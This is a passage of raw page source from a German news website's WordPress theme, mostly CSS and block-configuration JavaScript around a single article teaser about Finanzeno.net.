Sans!important;font-size:12px!important;line-height:1!important;font-weight:600!important;text-transform:uppercase!important;background-color:#ec3535;color:#ffffff}.tdi_204 .td-module-meta-info{top:auto;bottom:0;padding:0 15px 20px 18px}.tdi_204 .entry-title{margin:16px 0 12px 0;font-family:Work Sans!important;font-size:20px!important;line-height:1!important;font-weight:700!important}.tdi_204 .td-excerpt{margin:0px;display:none;color:#ffffff}.tdi_204 .td-post-category:not(.td-post-extra-category){display:none}.tdi_204 .td-author-date{display:inline}.tdi_204 .entry-review-stars{display:inline-block}.tdi_204 .td-icon-star,.tdi_204 .td-icon-star-empty,.tdi_204 .td-icon-star-half{font-size:15px}.tdi_204 .td-module-comments{display:none}.tdi_204 .td-read-more{display:none}.tdi_204 .td-module-exclusive .td-module-title a:before{display:none;padding:5px 8px;border-radius:2px;color:#ffffff;background-color:#ec3535;font-family:Work Sans!important;font-size:13px!important;line-height:1!important;font-weight:600!important;text-transform:uppercase!important}.tdi_204 .td-module-exclusive:hover .td-module-title a:before{color:#ffffff;background-color:#ec3535}.tdi_204 .td-read-more a{text-transform:uppercase!important;background-color:rgba(255,255,255,0)!important}.tdi_204 .td-editor-date,.tdi_204 .td-editor-date .td-post-author-name a,.tdi_204 .td-editor-date .entry-date,.tdi_204 .td-module-comments a{font-family:Work Sans!important;font-size:13px!important;line-height:1.2!important;font-weight:500!important;text-transform:capitalize!important}.tdi_204 .td-module-thumb a:after{content:'';position:absolute;top:0;left:0;width:100%;height:100%;background:-webkit-linear-gradient(0deg,rgba(0,0,0,0.8),rgba(0,0,0,0.5) 42%,rgba(0,0,0,0) 61%,rgba(0,0,0,0));background:linear-gradient(0deg,rgba(0,0,0,0.8),rgba(0,0,0,0.5) 42%,rgba(0,0,0,0) 61%,rgba(0,0,0,0))}.tdi_204 .td-post-category:hover{background-color:#000000;color:#ffffff}.tdi_204 .td-module-title a{color:#ffffff;box-shadow:inset 0 0 0 0 #000}.tdi_204 .td_module_wrap:hover .td-module-title a{color:rgba(255,255,255,0.8)}.tdi_204 .td-post-author-name a{color:#ffffff}.tdi_204 .td-post-author-name:hover a{color:rgba(255,255,255,0.8)}.tdi_204 .td-post-date,.tdi_204 .td-post-author-name span{color:#ffffff}html:not([class*='ie']) .tdi_204 .td-module-container:hover .entry-thumb:before{opacity:0}.tdi_204 .td-read-more:hover a{background-color:rgba(255,255,255,0)!important}@media (min-width:768px){.tdi_204 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}@media (min-width:1019px) and (max-width:1140px){.tdi_204 .td-module-thumb{height:340px}.tdi_204 .td-module-meta-info{padding:0 10px 15px 12px}.tdi_204 .entry-title{margin:12px 0 8px 0;font-size:18px!important}.tdi_204 .td-post-author-name{display:none}.tdi_204 .td-module-exclusive .td-module-title a:before{font-size:12px!important}.tdi_204 .td-module-title a{box-shadow:inset 0 0 0 0 #000}@media (min-width:768px){.tdi_204 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (min-width:768px) and (max-width:1018px){.tdi_204 .td-module-thumb{height:280px}.tdi_204 .td-post-category{padding:4px 6px}.tdi_204 .td-module-meta-info{padding:0 5px 15px 10px}.tdi_204 .entry-title{margin:10px 0 6px 0;font-size:16px!important}.tdi_204 .td-post-author-name{display:none}.tdi_204 .td-module-exclusive .td-module-title a:before{font-size:12px!important}.tdi_204 .td-editor-date,.tdi_204 .td-editor-date .td-post-author-name a,.tdi_204 .td-editor-date .entry-date,.tdi_204 .td-module-comments a{font-size:12px!important}.tdi_204 .td-module-title a{box-shadow:inset 0 0 0 0 #000}@media (min-width:768px){.tdi_204 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (max-width:767px){.tdi_204 .td-module-thumb{height:450px}.tdi_204 .td-module-meta-info{max-width:100%;padding:0 20px 20px}.tdi_204 .entry-title{margin:12px 0 10px 0;font-size:30px!important}.tdi_204 .td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_204 .td-module-title a{box-shadow:inset 0 0 0 0 #000}@media (min-width:768px){.tdi_204 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}</style><script type="rocketlazyloadscript">var block_tdi_204 = new tdBlock();
  2461. block_tdi_204.id = "tdi_204";
  2462. block_tdi_204.atts = '{"modules_on_row":"","limit":"1","modules_category":"above","show_btn":"none","show_excerpt":"none","ajax_pagination":"","td_ajax_preloading":"","sort":"","category_id":"","f_title_font_size":"eyJhbGwiOiIyMCIsInBvcnRyYWl0IjoiMTYiLCJwaG9uZSI6IjMwIiwibGFuZHNjYXBlIjoiMTgifQ==","f_title_font_line_height":"1","show_cat":"none","meta_info_border_style":"","meta_padding":"eyJhbGwiOiIwIDE1cHggMjBweCAxOHB4IiwibGFuZHNjYXBlIjoiMCAxMHB4IDE1cHggMTJweCIsInBvcnRyYWl0IjoiMCA1cHggMTVweCAxMHB4IiwicGhvbmUiOiIwIDIwcHggMjBweCJ9","modules_divider":"","image_size":"td_696x0","meta_info_align":"bottom","image_floated":"","tdc_css":"eyJhbGwiOnsibWFyZ2luLXRvcCI6Ii0yNCIsIm1hcmdpbi1ib3R0b20iOiIzMCIsImRpc3BsYXkiOiIifSwibGFuZHNjYXBlIjp7Im1hcmdpbi10b3AiOiItMjAiLCJtYXJnaW4tYm90dG9tIjoiMjAiLCJkaXNwbGF5IjoiIn0sImxhbmRzY2FwZV9tYXhfd2lkdGgiOjExNDAsImxhbmRzY2FwZV9taW5fd2lkdGgiOjEwMTksInBvcnRyYWl0Ijp7Im1hcmdpbi10b3AiOiItMTYiLCJtYXJnaW4tYm90dG9tIjoiMTYiLCJkaXNwbGF5IjoiIn0sInBvcnRyYWl0X21heF93aWR0aCI6MTAxOCwicG9ydHJhaXRfbWluX3dpZHRoIjo3NjgsInBob25lIjp7ImRpc3BsYXkiOiIifSwicGhvbmVfbWF4X3dpZHRoIjo3Njd9","meta_info_horiz":"content-horiz-left","f_title_font_weight":"700","image_height":"eyJhbGwiOiIxMDAiLCJwb3J0cmFpdCI6IjE0MCJ9","all_modules_space":"0","art_excerpt":"0","art_title":"eyJhbGwiOiIxNnB4IDAgMTJweCAwIiwibGFuZHNjYXBlIjoiMTJweCAwIDhweCAwIiwicG9ydHJhaXQiOiIxMHB4IDAgNnB4IDAiLCJwaG9uZSI6IjEycHggMCAxMHB4IDAifQ==","btn_bg":"rgba(255,255,255,0)","f_btn_font_transform":"uppercase","f_btn_font_weight":"","f_cat_font_transform":"uppercase","f_cat_font_weight":"600","btn_bg_hover":"rgba(255,255,255,0)","meta_width":"eyJwaG9uZSI6IjEwMCUifQ==","show_audio":"","show_com":"none","show_date":"","show_author":"eyJsYW5kc2NhcGUiOiJub25lIiwicG9ydHJhaXQiOiJub25lIn0=","mc1_el":"10","f_title_font_family":"653","f_title_font_transform":"","title_txt":"#ffffff","title_txt_hover":"rgba(255,255,255,0.8)","ex_txt":"#ffffff","cat_txt":"#ffffff","cat_bg":"#ec3535","cat_bg_hover":"#000000","author_txt":"#ffffff","modules_category_padding":"eyJhbGwiOiI1cHggOHB4IiwicG9ydHJhaXQiOiI0cHggNnB4In0=","f_cat_font_family":"653","f_cat_font_size":"eyJhbGwiOiIxMiIsInBvcnRyYWl0IjoiMTIiLCJwaG9uZSI6IjEyIn0=","f_cat_font_line_height":"1","excerpt_middle":"yes","cat_txt_hover":"#ffffff","modules_gap":"0","modules_space":"0","modules_height":"eyJwb3J0cmFpdCI6IjI4MCIsImFsbCI6IjQyMCIsImxhbmRzY2FwZSI6IjM0MCIsInBob25lIjoiNDUwIn0=","image_margin":"0","color_overlay":"eyJ0eXBlIjoiZ3JhZGllbnQiLCJjb2xvcjEiOiJyZ2JhKDAsMCwwLDApIiwiY29sb3IyIjoicmdiYSgwLDAsMCwwLjgpIiwibWl4ZWRDb2xvcnMiOlt7ImNvbG9yIjoicmdiYSgwLDAsMCwwLjUpIiwicGVyY2VudGFnZSI6NDJ9LHsiY29sb3IiOiJyZ2JhKDAsMCwwLDApIiwicGVyY2VudGFnZSI6NjF9XSwiZGVncmVlIjoiMCIsImNzcyI6ImJhY2tncm91bmQ6IC13ZWJraXQtbGluZWFyLWdyYWRpZW50KDBkZWcscmdiYSgwLDAsMCwwLjgpLHJnYmEoMCwwLDAsMC41KSA0MiUscmdiYSgwLDAsMCwwKSA2MSUscmdiYSgwLDAsMCwwKSk7YmFja2dyb3VuZDogbGluZWFyLWdyYWRpZW50KDBkZWcscmdiYSgwLDAsMCwwLjgpLHJnYmEoMCwwLDAsMC41KSA0MiUscmdiYSgwLDAsMCwwKSA2MSUscmdiYSgwLDAsMCwwKSk7IiwiY3NzUGFyYW1zIjoiMGRlZyxyZ2JhKDAsMCwwLDAuOCkscmdiYSgwLDAsMCwwLjUpIDQyJSxyZ2JhKDAsMCwwLDApIDYxJSxyZ2JhKDAsMCwwLDApIn0=","mc2_el":"26","modules_category_radius":"2","excl_padd":"5px 8px","excl_radius":"2","excl_color":"#ffffff","excl_color_h":"#ffffff","excl_bg":"#ec3535","excl_bg_h":"#ec3535","f_excl_font_transform":"uppercase","f_excl_font_weight":"600","f_excl_font_family":"653","f_excl_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIiLCJsYW5kc2NhcGUiOiIxMiIsInBob25lIjoiMTEifQ==","f_excl_font_line_height":"1","pag_border_width":"0","prev_tdicon":"tdc-font-tdmp tdc-font-tdmp-arrow-left","next_tdicon":"tdc-font-tdmp tdc-font-tdmp-arrow-right","pag_icons_size":"20","pag_border_radius":"2","pag_padding":"0","excl_show":"none","author_txt_hover":"rgba(255,255,255,0.8)","date_txt":"#ffffff","f_meta_font_family":"653","f_meta_font_transform":"capitalize","f_meta_font_weight":"500","f_meta_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIifQ==","f_meta_font_line_height":"1.2","block_template_id":"td_block_template_2","block_type":"td_flex_block_2","separator":"","custom_title":"","custom_url":"","title_tag":"","mc2_tl":"","mc2_title_tag":"","post_ids":"","taxonomies":"","category_ids":"","in_all_terms":"","tag_slug":"","autors_id":"","installed_post_types":"","include_cf_posts":"","exclude_cf_posts":"","linked_posts":"","favourite_only":"","locked_only":"","offset":"","open_in_new_window":"","show_modified_date":"","time_ago":"","time_ago_add_txt":"ago","time_ago_txt_pos":"","review_source":"","el_class":"","td_query_cache":"","td_query_cache_expiration":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","block_title_over":"","block_title_space":"","image_alignment":"50","image_radius":"","image_margin_right":"","image_margin_forced":"","show_favourites":"","fav_size":"2","fav_space":"","fav_ico_color":"","fav_ico_color_h":"","fav_bg":"","fav_bg_h":"","fav_shadow_shadow_header":"","fav_shadow_shadow_title":"Shadow","fav_shadow_shadow_size":"","fav_shadow_shadow_offset_horizontal":"","fav_shadow_shadow_offset_vertical":"","fav_shadow_shadow_spread":"","fav_shadow_shadow_color":"","video_icon":"","video_icon_pos":"center","video_popup":"yes","video_rec":"","spot_header":"","video_rec_title":"","video_rec_color":"","video_rec_disable":"","autoplay_vid":"","show_vid_t":"inline-block","vid_t_margin":"","vid_t_padding":"","video_title_color":"","video_title_color_h":"","video_bg":"","video_overlay":"","vid_t_color":"","vid_t_bg_color":"","f_vid_title_font_header":"","f_vid_title_font_title":"Video pop-up article title","f_vid_title_font_settings":"","f_vid_title_font_family":"","f_vid_title_font_size":"","f_vid_title_font_line_height":"","f_vid_title_font_style":"","f_vid_title_font_weight":"","f_vid_title_font_transform":"","f_vid_title_font_spacing":"","f_vid_title_":"","f_vid_time_font_title":"Video duration text","f_vid_time_font_settings":"","f_vid_time_font_family":"","f_vid_time_font_size":"","f_vid_time_font_line_height":"","f_vid_time_font_style":"","f_vid_time_font_weight":"","f_vid_time_font_transform":"","f_vid_time_font_spacing":"","f_vid_time_":"","excl_txt":"","excl_margin":"","all_excl_border":"","all_excl_border_style":"solid","all_excl_border_color":"","excl_border_color_h":"","f_excl_font_header":"","f_excl_font_title":"Label text","f_excl_font_settings":"","f_excl_font_style":"","f_excl_font_spacing":"","f_excl_":"","meta_margin":"","meta_info_border_radius":"","modules_category_margin":"","modules_cat_border":"","modules_extra_cat":"","show_review":"inline-block","review_space":"","review_size":"2.5","review_distance":"","btn_title":"","btn_margin":"","btn_padding":"","btn_border_width":"","btn_radius":"","nextprev_position":"top","nextprev_split":"","nextprev":"","pag_icons_space":"","f_header_font_header":"","f_header_font_title":"Block header","f_header_font_settings":"","f_header_font_family":"","f_header_font_size":"","f_header_font_line_height":"","f_header_font_style":"","f_header_font_weight":"","f_header_font_transform":"","f_header_font_spacing":"","f_header_":"","f_ajax_font_title":"Ajax categories","f_ajax_font_settings":"","f_ajax_font_family":"","f_ajax_font_size":"","f_ajax_font_line_height":"","f_ajax_font_style":"","f_ajax_font_weight":"","f_ajax_font_transform":"","f_ajax_font_spacing":"","f_ajax_":"","f_more_font_title":"Load more button","f_more_font_settings":"","f_more_font_family":"","f_more_font_size":"","f_more_font_line_height":"","f_more_font_style":"","f_more_font_weight":"","f_more_font_transform":"","f_more_font_spacing":"","f_more_":"","f_title_font_header":"","f_title_font_title":"Article title","f_title_font_settings":"","f_title_font_style":"","f_title_font_spacing":"","f_title_":"","f_cat_font_title":"Article category tag","f_cat_font_settings":"","f_cat_font_style":"","f_cat_font_spacing":"","f_cat_":"","f_meta_font_title":"Article meta info","f_meta_font_settings":"","f_meta_font_style":"","f_meta_font_spacing":"","f_meta_":"","f_ex_font_title":"Article excerpt","f_ex_font_settings":"","f_ex_font_family":"","f_ex_font_size":"","f_ex_font_line_height":"","f_ex_font_style":"","f_ex_font_weight":"","f_ex_font_transform":"","f_ex_font_spacing":"","f_ex_":"","f_btn_font_title":"Article read more button","f_btn_font_settings":"","f_btn_font_family":"","f_btn_font_size":"","f_btn_font_line_height":"","f_btn_font_style":"","f_btn_font_spacing":"","f_btn_":"","mix_color":"","mix_type":"","fe_brightness":"1","fe_contrast":"1","fe_saturate":"1","mix_color_h":"","mix_type_h":"","fe_brightness_h":"1","fe_contrast_h":"1","fe_saturate_h":"1","meta_bg":"","nextprev_icon":"","nextprev_icon_h":"","nextprev_bg":"","nextprev_bg_h":"","all_underline_height":"","all_underline_color":"","cat_border":"","cat_border_hover":"","com_txt":"","com_icon":"","rev_txt":"","btn_txt":"","btn_txt_hover":"","btn_border":"","btn_border_hover":"","ajax_pagination_next_prev_swipe":"","ajax_pagination_infinite_stop":"","css":"","td_column_number":1,"header_color":"","color_preset":"","border_top":"","class":"tdi_204","tdc_css_class":"tdi_204","tdc_css_class_style":"tdi_204_rand_style"}';
  2463. block_tdi_204.td_column_number = "1";
  2464. block_tdi_204.block_type = "td_flex_block_2";
  2465. block_tdi_204.post_count = "1";
  2466. block_tdi_204.found_posts = "3784";
  2467. block_tdi_204.header_color = "";
  2468. block_tdi_204.ajax_pagination_infinite_stop = "";
  2469. block_tdi_204.max_num_pages = "3784";
  2470. tdBlocksArray.push(block_tdi_204);
  2471. </script><div class="td-block-title-over"><div class="td-block-title-wrap"></div></div><div class="td-block-inner-pagination"><div id=tdi_204 class="td_block_inner td-mc2-wrap">
  2472.        <div class="td_module_flex_2 td_module_wrap td-animation-stack td-cpt-post">
  2473.            <div class="td-module-container">
  2474.                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/finanzeno-net/" rel="bookmark" class="td-image-wrap " title="Finanzeno.net Schafft Erstklassige Online-Finanzplattformen"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/05/Finanzeno.net-Schafft-Erstklassige-Online-Finanzplattformen-696x392.jpg"  ></span></a></div>                
  2475.                <div class="td-module-meta-info">
  2476.                                        
  2477.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/finanzeno-net/" rel="bookmark" title="Finanzeno.net Schafft Erstklassige Online-Finanzplattformen">Finanzeno.net Schafft Erstklassige Online-Finanzplattformen</a></h3>
  2478.                    
  2479.                                            <div class="td-editor-date">
  2480.                                                                                    
  2481.                                                            <span class="td-author-date">
  2482.                                    <span class="td-post-author-name"><a href="https://nachrichtenmorgen.de/author/mianbunny/">Jack Hobin</a> <span>-</span> </span>                                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-06T17:15:57+02:00" >Mai 6, 2024</time></span>                                                                                                        </span>
  2483.                                                    </div>
  2484.                    
  2485.                    
  2486.                                    </div>
  2487.            </div>
  2488.        </div>
  2489.  
  2490.        </div></div></div><div class="td_block_wrap td_flex_block_1 tdi_205 td_with_ajax_pagination td-pb-border-top td_block_template_1 td_flex_block"  data-td-block-uid="tdi_205" >
  2491. <style>.tdi_205{margin-bottom:0px!important}@media (min-width:768px) and (max-width:1018px){.tdi_205{margin-top:-5px!important}}</style>
  2492. <style>.tdi_205 .entry-thumb{background-position:center 50%}.tdi_205 .td-image-container{display:none}.tdi_205 .entry-thumb{background-image:none!important}body .tdi_205 .td-favorite{font-size:36px;box-shadow:1px 1px 4px 0px rgba(0,0,0,0.2)}.tdi_205 .td-module-meta-info{padding:0px;border-color:#eaeaea}.tdi_205 .td_module_wrap{padding-left:0px;padding-right:0px;padding-bottom:6px;margin-bottom:6px}.tdi_205 .td_block_inner{margin-left:-0px;margin-right:-0px}.tdi_205 .td-module-container:before{bottom:-6px;border-color:#eaeaea}.tdi_205 .td-module-container{padding:0 0 15px;border-width:0 0 1px 0;border-style:solid;border-color:#000;border-color:#eaeaea!important}.tdi_205 .td-post-vid-time{display:block}.tdi_205 .td-post-category{margin:0 5px 0 0;padding:2px 0;background-color:rgba(255,255,255,0);color:#ec3535;border-width:0px;border-style:solid;border-color:#aaa;font-family:Work Sans!important;font-size:12px!important;line-height:1!important;font-weight:600!important;text-transform:uppercase!important;letter-spacing:-0.5px!important}.tdi_205 .td-author-photo .avatar{width:20px;height:20px;margin-right:6px;border-radius:50%}.tdi_205 .td-excerpt{display:none;margin:0px;column-count:1;column-gap:48px}.tdi_205 .td-audio-player{opacity:1;visibility:visible;height:auto;font-size:13px}.tdi_205 .td-read-more{display:none}.tdi_205 .td-author-date{display:inline}.tdi_205 .td-post-author-name{display:none}.tdi_205 .entry-review-stars{display:none}.tdi_205 .td-icon-star,.tdi_205 .td-icon-star-empty,.tdi_205 .td-icon-star-half{font-size:15px}.tdi_205 .td-module-comments{display:none}.tdi_205 .td_module_wrap:nth-last-child(1){margin-bottom:0;padding-bottom:0}.tdi_205 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none}.tdi_205 .td-post-category:hover{background-color:rgba(255,255,255,0)!important;color:#000000}.tdi_205 .td-module-title a{color:#000000;box-shadow:inset 0 0 0 0 #000}.tdi_205 .td_module_wrap:hover .td-module-title a{color:#f43f3f!important}.tdi_205 .td-post-date,.tdi_205 .td-post-author-name span{color:#000000}.tdi_205.td_with_ajax_pagination .td-next-prev-wrap a,.tdi_205 .td-load-more-wrap a{color:#000000;background-color:rgba(255,255,255,0);border-width:0px}.tdi_205 .td-load-more-wrap a .td-load-more-icon-svg svg,.tdi_205 .td-load-more-wrap a .td-load-more-icon-svg svg *,.tdi_205.td_with_ajax_pagination .td-next-prev-wrap .td-next-prev-icon-svg svg,.tdi_205.td_with_ajax_pagination .td-next-prev-wrap .td-next-prev-icon-svg svg *{fill:#000000}.tdi_205.td_with_ajax_pagination .td-next-prev-wrap a:hover,.tdi_205 .td-load-more-wrap a:hover{color:#ec3535;background-color:rgba(255,255,255,0)!important;border-color:rgba(255,255,255,0)!important}.tdi_205 .td-load-more-wrap a:hover .td-load-more-icon-svg svg,.tdi_205 .td-load-more-wrap a:hover .td-load-more-icon-svg svg *,.tdi_205.td_with_ajax_pagination .td-next-prev-wrap a:hover .td-next-prev-icon-svg svg,.tdi_205.td_with_ajax_pagination .td-next-prev-wrap a:hover .td-next-prev-icon-svg svg *{fill:#ec3535}.tdi_205 .td-module-exclusive .td-module-title a:before{display:inline-block;margin:-4px 5px 0 0;padding:3px 5px;border-radius:2px;color:#ffffff;background-color:#ec3535;font-family:Work Sans!important;font-size:12px!important;line-height:1!important;font-weight:500!important;text-transform:uppercase!important;letter-spacing:-0.5px!important}.tdi_205 .td-module-exclusive:hover .td-module-title a:before{color:#ffffff;background-color:#ec3535}.tdi_205 .entry-title{margin:0 0 10px;font-family:PT Serif!important;font-size:14px!important;line-height:1.4!important;font-weight:600!important}.tdi_205.td_with_ajax_pagination .td-next-prev-wrap,.tdi_205 .td-load-more-wrap{margin-top:15px}.tdi_205.td_with_ajax_pagination .td-next-prev-wrap a,.tdi_205 .td-load-more-wrap a i{font-size:22px}.tdi_205 .td-load-more-wrap a .td-load-more-icon-svg svg,.tdi_205.td_with_ajax_pagination .td-next-prev-wrap .td-next-prev-icon-svg svg{width:22px;height:calc(22px + 1px)}.tdi_205 .td-editor-date,.tdi_205 .td-editor-date .td-post-author-name a,.tdi_205 .td-editor-date .entry-date,.tdi_205 .td-module-comments a{font-family:Work Sans!important;font-size:12px!important;line-height:1!important;font-weight:500!important;letter-spacing:-0.5px!important}html:not([class*='ie']) .tdi_205 .td-module-container:hover .entry-thumb:before{opacity:0}@media (min-width:768px){.tdi_205 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}@media (min-width:1019px) and (max-width:1140px){.tdi_205 .td-image-container{display:none}.tdi_205 .td_module_wrap{padding-bottom:3px;margin-bottom:3px;padding-bottom:3px!important;margin-bottom:3px!important}.tdi_205 .td-module-container:before{bottom:-3px}.tdi_205 .td-module-container{padding:0 0 10px}.tdi_205 .td_module_wrap:nth-last-child(1){margin-bottom:0!important;padding-bottom:0!important}.tdi_205 .td_module_wrap .td-module-container:before{display:block!important}.tdi_205 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none!important}.tdi_205 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_205 .td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_205 .entry-title{margin:0 0 6px;font-size:13px!important;line-height:1.3!important}.tdi_205.td_with_ajax_pagination .td-next-prev-wrap,.tdi_205 .td-load-more-wrap{margin-top:10px}.tdi_205.td_with_ajax_pagination .td-next-prev-wrap a,.tdi_205 .td-load-more-wrap a i{font-size:20px}.tdi_205 .td-load-more-wrap a .td-load-more-icon-svg svg,.tdi_205.td_with_ajax_pagination .td-next-prev-wrap .td-next-prev-icon-svg svg{width:20px;height:calc(20px + 1px)}.tdi_205 .td-post-category{font-size:11px!important}.tdi_205 .td-editor-date,.tdi_205 .td-editor-date .td-post-author-name a,.tdi_205 .td-editor-date .entry-date,.tdi_205 .td-module-comments a{font-size:11px!important}@media (min-width:768px){.tdi_205 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (min-width:768px) and (max-width:1018px){.tdi_205 .td-image-container{display:none}.tdi_205 .td_module_wrap{padding-bottom:2.5px;margin-bottom:2.5px;padding-bottom:2.5px!important;margin-bottom:2.5px!important}.tdi_205 .td-module-container:before{bottom:-2.5px}.tdi_205 .td-module-container{padding:0 0 8px}.tdi_205 .td-post-category{margin:0px;padding:0px}.tdi_205 .td-post-category:not(.td-post-extra-category){display:none}.tdi_205 .td-author-date{display:none}.tdi_205 .td-post-date,.tdi_205 .td-post-author-name span{display:none}.tdi_205 .td_module_wrap:nth-last-child(1){margin-bottom:0!important;padding-bottom:0!important}.tdi_205 .td_module_wrap .td-module-container:before{display:block!important}.tdi_205 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none!important}.tdi_205 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_205 .td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_205 .entry-title{margin:0px;font-size:12px!important}.tdi_205.td_with_ajax_pagination .td-next-prev-wrap,.tdi_205 .td-load-more-wrap{margin-top:5px}.tdi_205.td_with_ajax_pagination .td-next-prev-wrap a,.tdi_205 .td-load-more-wrap a i{font-size:18px}.tdi_205 .td-load-more-wrap a .td-load-more-icon-svg svg,.tdi_205.td_with_ajax_pagination .td-next-prev-wrap .td-next-prev-icon-svg svg{width:18px;height:calc(18px + 1px)}.tdi_205 .td-editor-date,.tdi_205 .td-editor-date .td-post-author-name a,.tdi_205 .td-editor-date .entry-date,.tdi_205 .td-module-comments a{font-size:10px!important}@media (min-width:768px){.tdi_205 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (max-width:767px){.tdi_205 .td-image-wrap{padding-bottom:110%}.tdi_205 .td-image-container{flex:0 0 30%;width:30%;display:none}.ie10 .tdi_205 .td-image-container,.ie11 .tdi_205 .td-image-container{flex:0 0 auto}.tdi_205 .td_module_wrap{padding-bottom:6px;margin-bottom:6px;padding-bottom:6px!important;margin-bottom:6px!important}.tdi_205 .td-module-container:before{bottom:-6px}.tdi_205 .td_module_wrap:nth-last-child(1){margin-bottom:0!important;padding-bottom:0!important}.tdi_205 .td_module_wrap .td-module-container:before{display:block!important}.tdi_205 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none!important}.tdi_205 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_205 .td-module-exclusive .td-module-title a:before{font-size:11px!important}@media (min-width:768px){.tdi_205 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}</style><script type="rocketlazyloadscript">var block_tdi_205 = new tdBlock();
  2493. block_tdi_205.id = "tdi_205";
  2494. block_tdi_205.atts = '{"modules_on_row":"","image_size":"","image_floated":"hidden","image_width":"eyJwaG9uZSI6IjMwIn0=","image_height":"eyJwaG9uZSI6IjExMCJ9","show_btn":"none","show_excerpt":"eyJwaG9uZSI6Im5vbmUiLCJhbGwiOiJub25lIn0=","show_com":"eyJwaG9uZSI6Im5vbmUiLCJhbGwiOiJub25lIn0=","show_author":"none","show_cat":"eyJwb3J0cmFpdCI6Im5vbmUifQ==","meta_padding":"0","f_title_font_size":"eyJhbGwiOiIxNCIsInBvcnRyYWl0IjoiMTIiLCJsYW5kc2NhcGUiOiIxMyJ9","f_title_font_line_height":"eyJhbGwiOiIxLjQiLCJsYW5kc2NhcGUiOiIxLjMifQ==","f_title_font_weight":"600","all_modules_space":"eyJhbGwiOiIxMiIsImxhbmRzY2FwZSI6IjYiLCJwb3J0cmFpdCI6IjUifQ==","category_id":"","show_date":"eyJwb3J0cmFpdCI6Im5vbmUifQ==","art_excerpt":"0","show_review":"none","tdc_css":"eyJhbGwiOnsibWFyZ2luLWJvdHRvbSI6IjAiLCJkaXNwbGF5IjoiIn0sInBvcnRyYWl0Ijp7Im1hcmdpbi10b3AiOiItNSIsImRpc3BsYXkiOiIifSwicG9ydHJhaXRfbWF4X3dpZHRoIjoxMDE4LCJwb3J0cmFpdF9taW5fd2lkdGgiOjc2OCwicGhvbmUiOnsiZGlzcGxheSI6IiJ9LCJwaG9uZV9tYXhfd2lkdGgiOjc2NywibGFuZHNjYXBlIjp7ImRpc3BsYXkiOiIifSwibGFuZHNjYXBlX21heF93aWR0aCI6MTE0MCwibGFuZHNjYXBlX21pbl93aWR0aCI6MTAxOX0=","f_title_font_family":"456","mc1_el":"10","title_txt_hover":"#f43f3f","title_txt":"#000000","art_title":"eyJhbGwiOiIwIDAgMTBweCIsInBvcnRyYWl0IjoiMCIsImxhbmRzY2FwZSI6IjAgMCA2cHgifQ==","modules_border_size":"0 0 1px 0","m_padding":"eyJhbGwiOiIwIDAgMTVweCIsImxhbmRzY2FwZSI6IjAgMCAxMHB4IiwicG9ydHJhaXQiOiIwIDAgOHB4In0=","modules_gap":"0","f_meta_font_size":"eyJhbGwiOiIxMiIsInBvcnRyYWl0IjoiMTAiLCJsYW5kc2NhcGUiOiIxMSJ9","f_meta_font_line_height":"1","f_meta_font_weight":"500","f_meta_font_family":"653","modules_cat_border":"0","modules_category_padding":"eyJhbGwiOiIycHggMCIsInBvcnRyYWl0IjoiMCJ9","f_cat_font_family":"653","f_cat_font_transform":"uppercase","f_cat_font_size":"eyJhbGwiOiIxMiIsImxhbmRzY2FwZSI6IjExIn0=","f_cat_font_weight":"600","f_cat_font_line_height":"1","f_meta_font_spacing":"-0.5","f_cat_font_spacing":"-0.5","cat_bg":"rgba(255,255,255,0)","cat_bg_hover":"rgba(255,255,255,0)","cat_txt":"#ec3535","cat_txt_hover":"#000000","modules_category_margin":"eyJhbGwiOiIwIDVweCAwIDAiLCJwb3J0cmFpdCI6IjAifQ==","ajax_pagination":"next_prev","pag_border_width":"0","pag_space":"eyJhbGwiOiIxNSIsImxhbmRzY2FwZSI6IjEwIiwicG9ydHJhaXQiOiI1In0=","prev_tdicon":"tdc-font-tdmp tdc-font-tdmp-arrow-left","next_tdicon":"tdc-font-tdmp tdc-font-tdmp-arrow-right","pag_icons_size":"eyJhbGwiOiIyMiIsImxhbmRzY2FwZSI6IjIwIiwicG9ydHJhaXQiOiIxOCJ9","pag_text":"#000000","pag_h_text":"#ec3535","pag_bg":"rgba(255,255,255,0)","pag_h_bg":"rgba(255,255,255,0)","f_excl_font_family":"653","f_excl_font_transform":"uppercase","f_excl_font_size":"eyJhbGwiOiIxMiIsImxhbmRzY2FwZSI6IjExIiwicG9ydHJhaXQiOiIxMSIsInBob25lIjoiMTEifQ==","f_excl_font_weight":"500","f_excl_font_line_height":"1","f_excl_font_spacing":"-0.5","excl_padd":"3px 5px","excl_color":"#ffffff","excl_color_h":"#ffffff","excl_bg":"#ec3535","excl_bg_h":"#ec3535","excl_radius":"2","excl_margin":"-4px 5px 0 